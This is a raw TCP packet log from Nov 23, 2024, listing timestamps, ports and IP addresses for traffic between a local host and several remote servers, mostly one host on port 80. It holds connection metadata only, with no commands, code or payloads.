Nov 23, 2024 07:09:42.493670940 CET	443	49856	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:42.493938923 CET	49856	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:42.493954897 CET	443	49856	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:42.495002031 CET	443	49856	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:42.495090008 CET	49856	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:42.496274948 CET	49856	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:42.496335983 CET	443	49856	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:42.496572018 CET	49856	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:42.496577978 CET	443	49856	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:42.507105112 CET	443	49861	162.159.61.3	192.168.2.6
Nov 23, 2024 07:09:42.507369995 CET	49861	443	192.168.2.6	162.159.61.3
Nov 23, 2024 07:09:42.507400036 CET	443	49861	162.159.61.3	192.168.2.6
Nov 23, 2024 07:09:42.507616997 CET	443	49860	162.159.61.3	192.168.2.6
Nov 23, 2024 07:09:42.507817030 CET	49860	443	192.168.2.6	162.159.61.3
Nov 23, 2024 07:09:42.507852077 CET	443	49860	162.159.61.3	192.168.2.6
Nov 23, 2024 07:09:42.508100033 CET	443	49859	162.159.61.3	192.168.2.6
Nov 23, 2024 07:09:42.508230925 CET	443	49862	162.159.61.3	192.168.2.6
Nov 23, 2024 07:09:42.508330107 CET	49859	443	192.168.2.6	162.159.61.3
Nov 23, 2024 07:09:42.508347988 CET	443	49859	162.159.61.3	192.168.2.6
Nov 23, 2024 07:09:42.508438110 CET	49862	443	192.168.2.6	162.159.61.3
Nov 23, 2024 07:09:42.508450985 CET	443	49862	162.159.61.3	192.168.2.6
Nov 23, 2024 07:09:42.508888960 CET	443	49860	162.159.61.3	192.168.2.6
Nov 23, 2024 07:09:42.508971930 CET	49860	443	192.168.2.6	162.159.61.3
Nov 23, 2024 07:09:42.509000063 CET	443	49861	162.159.61.3	192.168.2.6
Nov 23, 2024 07:09:42.509118080 CET	49861	443	192.168.2.6	162.159.61.3
Nov 23, 2024 07:09:42.509116888 CET	443	49859	162.159.61.3	192.168.2.6
Nov 23, 2024 07:09:42.509268999 CET	49860	443	192.168.2.6	162.159.61.3
Nov 23, 2024 07:09:42.509336948 CET	443	49860	162.159.61.3	192.168.2.6
Nov 23, 2024 07:09:42.509630919 CET	49861	443	192.168.2.6	162.159.61.3
Nov 23, 2024 07:09:42.509725094 CET	443	49861	162.159.61.3	192.168.2.6
Nov 23, 2024 07:09:42.509850979 CET	49859	443	192.168.2.6	162.159.61.3
Nov 23, 2024 07:09:42.509896994 CET	443	49862	162.159.61.3	192.168.2.6
Nov 23, 2024 07:09:42.509936094 CET	443	49859	162.159.61.3	192.168.2.6
Nov 23, 2024 07:09:42.509953022 CET	49862	443	192.168.2.6	162.159.61.3
Nov 23, 2024 07:09:42.510299921 CET	49862	443	192.168.2.6	162.159.61.3
Nov 23, 2024 07:09:42.510385036 CET	443	49862	162.159.61.3	192.168.2.6
Nov 23, 2024 07:09:42.551579952 CET	49877	443	192.168.2.6	23.209.72.40
Nov 23, 2024 07:09:42.551629066 CET	443	49877	23.209.72.40	192.168.2.6
Nov 23, 2024 07:09:42.551712990 CET	49877	443	192.168.2.6	23.209.72.40
Nov 23, 2024 07:09:42.552995920 CET	49877	443	192.168.2.6	23.209.72.40
Nov 23, 2024 07:09:42.553020954 CET	443	49877	23.209.72.40	192.168.2.6
Nov 23, 2024 07:09:42.558676958 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.558753967 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.558808088 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.558851004 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.559247017 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.559309959 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.559350014 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.559406996 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.560400963 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.560461044 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.560509920 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.560734034 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.561548948 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.561613083 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.561635017 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.561749935 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.562732935 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.562840939 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.562841892 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.562886000 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.563920975 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.564007998 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.564034939 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.564049959 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.565011024 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.565058947 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.565140009 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.565200090 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.566210985 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.566318035 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.566349030 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.566713095 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.567369938 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.567413092 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.567455053 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.567491055 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.568558931 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.568608999 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.568633080 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.568670988 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.569699049 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.569787979 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.569807053 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.569931030 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.570839882 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.570991039 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.571003914 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.571052074 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.572038889 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.572089911 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.572184086 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.572227001 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.573164940 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.573231936 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.573261023 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.573327065 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.574311972 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.574436903 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.574445963 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.574475050 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.575491905 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.575539112 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.575601101 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.575638056 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.576663017 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.576709986 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.576762915 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.576802969 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.577821970 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.577873945 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.577927113 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.577966928 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.578970909 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.579027891 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.579085112 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.579206944 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.580154896 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.580197096 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.580260038 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.589916945 CET	49856	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:42.589921951 CET	49860	443	192.168.2.6	162.159.61.3
Nov 23, 2024 07:09:42.589921951 CET	49862	443	192.168.2.6	162.159.61.3
Nov 23, 2024 07:09:42.589956045 CET	443	49860	162.159.61.3	192.168.2.6
Nov 23, 2024 07:09:42.589976072 CET	443	49862	162.159.61.3	192.168.2.6
Nov 23, 2024 07:09:42.589981079 CET	49859	443	192.168.2.6	162.159.61.3
Nov 23, 2024 07:09:42.596575975 CET	443	49858	162.159.61.3	192.168.2.6
Nov 23, 2024 07:09:42.596843958 CET	49858	443	192.168.2.6	162.159.61.3
Nov 23, 2024 07:09:42.596879005 CET	443	49858	162.159.61.3	192.168.2.6
Nov 23, 2024 07:09:42.597245932 CET	443	49858	162.159.61.3	192.168.2.6
Nov 23, 2024 07:09:42.597626925 CET	49858	443	192.168.2.6	162.159.61.3
Nov 23, 2024 07:09:42.597718954 CET	443	49858	162.159.61.3	192.168.2.6
Nov 23, 2024 07:09:42.622714043 CET	443	49855	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:42.623018980 CET	49855	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:42.623043060 CET	443	49855	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:42.624229908 CET	443	49855	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:42.624291897 CET	49855	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:42.624851942 CET	49855	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:42.624950886 CET	443	49855	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:42.625029087 CET	49855	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:42.636051893 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.636168957 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.636224985 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.636578083 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.636636019 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.636687994 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.637046099 CET	49861	443	192.168.2.6	162.159.61.3
Nov 23, 2024 07:09:42.637063980 CET	443	49861	162.159.61.3	192.168.2.6
Nov 23, 2024 07:09:42.637753010 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.637794971 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.637847900 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.637890100 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.638907909 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.638952971 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.639015913 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.639056921 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.640069008 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.640134096 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.640151978 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.640166044 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.641218901 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.641310930 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.641340017 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.641354084 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.642380953 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.642422915 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.642488003 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.642575026 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.643599033 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.643646002 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.643707991 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.643750906 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.644735098 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.644785881 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.644850969 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.644889116 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.645884037 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.645992994 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.646018982 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.646037102 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.647067070 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.647135019 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.647166967 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.647419930 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.648175001 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.648238897 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.648277044 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.649373055 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.649436951 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.649472952 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.649727106 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.650512934 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.650558949 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.650624037 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.650657892 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.651674986 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.651741028 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.651767015 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.651849031 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.652848959 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.652920008 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.652952909 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.652991056 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.653986931 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.654042959 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.654164076 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.654208899 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.655169964 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.655219078 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.655255079 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.655291080 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.656320095 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.656403065 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.656424999 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.656563044 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.657496929 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.657561064 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.657594919 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.657633066 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.658668041 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.658718109 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.658821106 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.658864975 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.659832954 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.659894943 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.659946918 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.659990072 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.660986900 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.661040068 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.661119938 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.661164045 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.662169933 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.662287951 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.662355900 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.663331985 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.663383961 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.663450003 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.663588047 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.664508104 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.664572954 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.664623976 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.664669991 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.665618896 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.665702105 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.665739059 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.665782928 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.666826010 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.666898966 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.666930914 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.667042971 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.667967081 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.668031931 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.668075085 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.668128967 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.669102907 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.669172049 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.669226885 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.669403076 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.670304060 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.670363903 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.670433044 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.670857906 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.671329021 CET	443	49855	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:42.671446085 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.671509981 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.671566010 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.671610117 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.672602892 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.672653913 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.672789097 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.672924042 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.673721075 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.673885107 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.708751917 CET	49878	443	192.168.2.6	20.198.118.190
Nov 23, 2024 07:09:42.708796024 CET	443	49878	20.198.118.190	192.168.2.6
Nov 23, 2024 07:09:42.709034920 CET	49878	443	192.168.2.6	20.198.118.190
Nov 23, 2024 07:09:42.709769964 CET	49878	443	192.168.2.6	20.198.118.190
Nov 23, 2024 07:09:42.709784985 CET	443	49878	20.198.118.190	192.168.2.6
Nov 23, 2024 07:09:42.742762089 CET	49858	443	192.168.2.6	162.159.61.3
Nov 23, 2024 07:09:42.742794991 CET	49861	443	192.168.2.6	162.159.61.3
Nov 23, 2024 07:09:42.742790937 CET	49855	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:42.742856026 CET	443	49855	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:42.759867907 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.759933949 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.759983063 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.760162115 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.760390043 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.760473013 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.760493994 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.760710955 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.761564016 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.761701107 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.761884928 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.762744904 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.762824059 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.762885094 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.762933016 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.763952017 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.764010906 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.764055014 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.764326096 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.765058994 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.765202045 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.765254021 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.766216040 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.766297102 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.766355991 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.767371893 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.767450094 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.767577887 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.767641068 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.768558979 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.768728971 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.768755913 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.768778086 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.769752026 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.769812107 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.769879103 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.770054102 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.770860910 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.770986080 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.771019936 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.771243095 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.772027969 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.772207975 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.772232056 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.772342920 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.773192883 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.773327112 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.773365021 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.773391008 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.774336100 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.774410963 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.774475098 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.774651051 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.775495052 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.775629044 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.775644064 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.775681019 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.776659966 CET	80	49817	185.215.113.206	192.168.2.6
